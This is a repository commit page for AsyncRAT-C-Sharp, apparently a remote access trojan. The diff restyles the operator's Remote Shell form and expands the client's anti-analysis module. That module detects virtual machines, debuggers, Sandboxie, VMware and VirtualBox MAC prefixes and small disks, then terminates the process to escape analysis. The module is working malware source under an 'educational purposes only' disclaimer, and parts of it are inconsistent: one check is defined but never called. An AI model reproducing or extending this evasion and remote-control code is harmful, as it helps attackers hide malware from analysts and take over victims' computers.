Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #31 from MrDevBot/master

Browse Source 
UI changes to the Remote Shell
This commit is contained in:
NYAN CAT 2019-05-21 15:51:14 +03:00 committed by GitHub
commit 3b4bd0dc05
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 788 additions and 704 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

147
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormShell.Designer.cs generated
View File

@ -28,67 +28,100 @@
/// </summary> /// </summary>
private void InitializeComponent() private void InitializeComponent()
{ {
this.components = new System.ComponentModel.Container(); this.components = new System.ComponentModel.Container();
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell)); System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell));
this.richTextBox1 = new System.Windows.Forms.RichTextBox(); this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.textBox1 = new System.Windows.Forms.TextBox(); this.textBox1 = new System.Windows.Forms.TextBox();
this.timer1 = new System.Windows.Forms.Timer(this.components); this.timer1 = new System.Windows.Forms.Timer(this.components);
this.SuspendLayout(); this.panel1 = new System.Windows.Forms.Panel();
// this.label1 = new System.Windows.Forms.Label();
// richTextBox1 this.panel1.SuspendLayout();
// this.SuspendLayout();
this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) //
| System.Windows.Forms.AnchorStyles.Left) // richTextBox1
| System.Windows.Forms.AnchorStyles.Right))); //
this.richTextBox1.BackColor = System.Drawing.SystemColors.ControlText; this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None; | System.Windows.Forms.AnchorStyles.Left)
this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); | System.Windows.Forms.AnchorStyles.Right)));
this.richTextBox1.ForeColor = System.Drawing.Color.White; this.richTextBox1.BackColor = System.Drawing.Color.White;
this.richTextBox1.Location = new System.Drawing.Point(0, 0); this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.richTextBox1.Name = "richTextBox1"; this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.richTextBox1.ReadOnly = true; this.richTextBox1.ForeColor = System.Drawing.SystemColors.ControlText;
this.richTextBox1.Size = new System.Drawing.Size(800, 398); this.richTextBox1.Location = new System.Drawing.Point(0, 0);
this.richTextBox1.TabIndex = 0; this.richTextBox1.Margin = new System.Windows.Forms.Padding(2);
this.richTextBox1.Text = ""; this.richTextBox1.Name = "richTextBox1";
// this.richTextBox1.ReadOnly = true;
// textBox1 this.richTextBox1.Size = new System.Drawing.Size(533, 268);
// this.richTextBox1.TabIndex = 0;
this.textBox1.BackColor = System.Drawing.SystemColors.ControlText; this.richTextBox1.Text = "";
this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom; //
this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); // textBox1
this.textBox1.ForeColor = System.Drawing.Color.White; //
this.textBox1.Location = new System.Drawing.Point(0, 424); this.textBox1.BackColor = System.Drawing.SystemColors.Window;
this.textBox1.Name = "textBox1"; this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom;
this.textBox1.Size = new System.Drawing.Size(800, 26); this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.textBox1.TabIndex = 1; this.textBox1.ForeColor = System.Drawing.SystemColors.ControlText;
this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown); this.textBox1.Location = new System.Drawing.Point(69, 272);
// this.textBox1.Margin = new System.Windows.Forms.Padding(2);
// timer1 this.textBox1.Name = "textBox1";
// this.textBox1.Size = new System.Drawing.Size(464, 20);
this.timer1.Enabled = true; this.textBox1.TabIndex = 1;
this.timer1.Interval = 1000; this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown);
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick); //
// // timer1
// FormShell //
// this.timer1.Enabled = true;
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.timer1.Interval = 1000;
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
this.BackColor = System.Drawing.SystemColors.ControlText; //
this.ClientSize = new System.Drawing.Size(800, 450); // panel1
this.Controls.Add(this.textBox1); //
this.Controls.Add(this.richTextBox1); this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(64)))), ((int)(((byte)(64)))), ((int)(((byte)(64)))));
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); this.panel1.Controls.Add(this.label1);
this.Name = "FormShell"; this.panel1.Dock = System.Windows.Forms.DockStyle.Left;
this.Text = "FormShell"; this.panel1.Location = new System.Drawing.Point(0, 0);
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed); this.panel1.Name = "panel1";
this.ResumeLayout(false); this.panel1.Size = new System.Drawing.Size(69, 292);
this.PerformLayout(); this.panel1.TabIndex = 2;
//
// label1
//
this.label1.AutoSize = true;
this.label1.ForeColor = System.Drawing.SystemColors.ActiveCaption;
this.label1.Location = new System.Drawing.Point(6, 274);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(60, 13);
this.label1.TabIndex = 0;
this.label1.Text = "Command :";
this.label1.Click += new System.EventHandler(this.Label1_Click);
//
// FormShell
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(64)))), ((int)(((byte)(64)))), ((int)(((byte)(64)))));
this.ClientSize = new System.Drawing.Size(533, 292);
this.Controls.Add(this.richTextBox1);
this.Controls.Add(this.textBox1);
this.Controls.Add(this.panel1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Margin = new System.Windows.Forms.Padding(2);
this.Name = "FormShell";
this.Text = "Remote Shell";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed);
this.Load += new System.EventHandler(this.FormShell_Load);
this.panel1.ResumeLayout(false);
this.panel1.PerformLayout();
this.ResumeLayout(false);
this.PerformLayout();
} }
#endregion #endregion
private System.Windows.Forms.TextBox textBox1; private System.Windows.Forms.TextBox textBox1;
public System.Windows.Forms.RichTextBox richTextBox1; public System.Windows.Forms.RichTextBox richTextBox1;
private System.Windows.Forms.Timer timer1; private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Panel panel1;
private System.Windows.Forms.Label label1;
} }
} }

13
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormShell.cs
View File

@ -4,6 +4,7 @@ using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.ComponentModel; using System.ComponentModel;
using System.Data; using System.Data;
using System.Diagnostics;
using System.Drawing; using System.Drawing;
using System.Linq; using System.Linq;
using System.Text; using System.Text;
@ -56,6 +57,16 @@ namespace AsyncRAT_Sharp.Forms
private void Timer1_Tick(object sender, EventArgs e) private void Timer1_Tick(object sender, EventArgs e)
{ {
if (!C.ClientSocket.Connected) this.Close(); if (!C.ClientSocket.Connected) this.Close();
} }
private void FormShell_Load(object sender, EventArgs e)
{
}
private void Label1_Click(object sender, EventArgs e)
{
Process.Start("https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands");
}
} }
} }

1129
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormShell.resx
View File

File diff suppressed because it is too large Load Diff

203
AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
View File

@ -1,67 +1,136 @@
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Management; using System.Linq;
using System.Runtime.InteropServices; using System.Management;
using System.Net.NetworkInformation;
// │ Author : NYAN CAT using System.Runtime.InteropServices;
// │ Name : Anti Analysis v0.2
// │ Contact : https://github.com/NYAN-x-CAT // │ Author : NYAN CAT
// │ Name : Anti Analysis v0.2
// This program is distributed for educational purposes only. // │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
namespace Client.Helper
{
class Anti_Analysis
{ namespace Client.Helper
public static void RunAntiAnalysis() {
{
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie()) class Anti_Analysis
Environment.FailFast(null); {
} private static long GB_50 = 50000000000;
public static void RunAntiAnalysis()
private static bool DetectVirtualMachine() {
{ if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) Environment.FailFast(null);
{ }
using (var items = searcher.Get())
{ internal static bool SmallHDD()
foreach (var item in items) {
{
string manufacturer = item["Manufacturer"].ToString().ToLower(); // Method One - main drive smaller than 50gb, likely a VM
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) long driveSize = Methods.GetMainDriveSize();
|| manufacturer.Contains("vmware") if (driveSize <= GB_50 * 2)
|| item["Model"].ToString() == "VirtualBox") return true;
{
return true; // Method Two - has common card of virtual machine
} //if (HasVMCard())
} //return true;
}
} // Method Three - checks for vm drivers
return false; if (HasVBOXDriver())
} return true;
private static bool DetectDebugger() // Method Four - if machine has been on for less than 5 mins
{ //if (GetUptime() < TimeSpan.FromMinutes(5))
bool isDebuggerPresent = false; //return true;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent; // Method Five - has VM mac address
} if (HasVMMac())
return true;
private static bool DetectSandboxie()
{ return false;
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) }
return true; private static bool HasVMMac()
else {
return false; var macAddr =
} (
from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up
[DllImport("kernel32.dll")] select nic.GetPhysicalAddress().ToString()
public static extern IntPtr GetModuleHandle(string lpModuleName); ).FirstOrDefault();
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] var macs = new[]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); {
} "00-05-69",
} "00:05:69",
"000569",
"00-50-56",
"00:50:56",
"005056",
"00-0C-29",
"00:0C:29",
"000C29",
"00-1C-14",
"00:1C:14",
"001C14",
"08-00-27",
"08:00:27",
"080027",
};
foreach (string mac in macs)
{
if (mac == macAddr)
return true;
}
return false;
}
private static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains("vmware")
|| item["Model"].ToString() == "VirtualBox")
{
return true;
}
}
}
}
return false;
}
private static bool DetectDebugger()
{
bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
private static bool DetectSandboxie()
{
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}